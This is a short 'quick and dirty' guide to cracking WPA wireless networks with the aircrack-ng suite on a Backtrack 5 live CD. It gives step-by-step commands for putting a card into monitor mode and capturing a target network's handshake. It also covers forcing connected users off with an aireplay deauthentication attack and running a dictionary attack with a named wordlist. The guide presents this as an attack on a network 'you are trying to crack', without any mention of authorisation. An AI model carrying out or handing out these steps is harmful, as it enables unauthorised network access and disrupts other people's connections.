Quick and dirty guide to cracking WPA wireless networks. Find more details, instructions and information at:
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Get live-cd or live-usb of Backtrack 5 here. You have a choice of Gnome or Kde, 32 or 64 bit.
Boot from the live-cd, which will automatically login as root. Type "startx" to load the gui. Open a terminal, from the applications menu.
The simplest method, but not necessarily the fastest, uses the aircrack-ng program suite.
Identify your wireless card. Type in "ifconfig" in the terminal, and read the output. Your wireless card will probably be either wlan0 or ath0. For the rest of this guide, we will assume wlan0.
Put your wireless card into monitor mode.
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# airodump-ng wlan0
If all goes well, you should see airodump start listing visible wireless networks, and displaying information about them. If you get an error, check google for assistance.
Press "ctrl+c" to close airodump once you see the name of the wireless network you are trying to crack. Run it again, with these changes to the command.
# airodump-ng wlan0 -c <wireless channel> -b <mac address of wireless AP> -w capture.cap
At this point, you will only be capturing packets related to the network in question. Wait until a station connects to the wireless network, and you capture the 4-way handshake. When this happens, airodump will display a message on the top line.
You can force any active stations to disconnect, at which point they will probably automatically reconnect. When they do, you can catch the handshake. To do this, you will use option #0 of aireplay. In another tab, run:
# aireplay-ng -0 60 wlan0 -b <mac address of wireless AP>
If your laptop's signal is strong enough, this will disconnect the station, forcing it to reconnect, and allowing you to capture the handshake. Go back to the first tab, and check on airodump's progress, where you should see the note that a handshake has been captured. If not, try the aireplay command again a few times. If you still don't see a handshake, try getting closer to the access point, a bigger wireless antenne, and double check that there is an active station connected to the wireless network.
Okay, so you've capture a 4way handshake. Now you can pass this to aircrack, which will perform a dictionary attack on the handshake. Depending on the size of the dictionary, this can take a few hours to run through the dictionary.
# aircrack-ng -w <password list> capture.cap
Backtrack has a decent password list at: /pentest/passwords/wordlists/darkc0de.lst
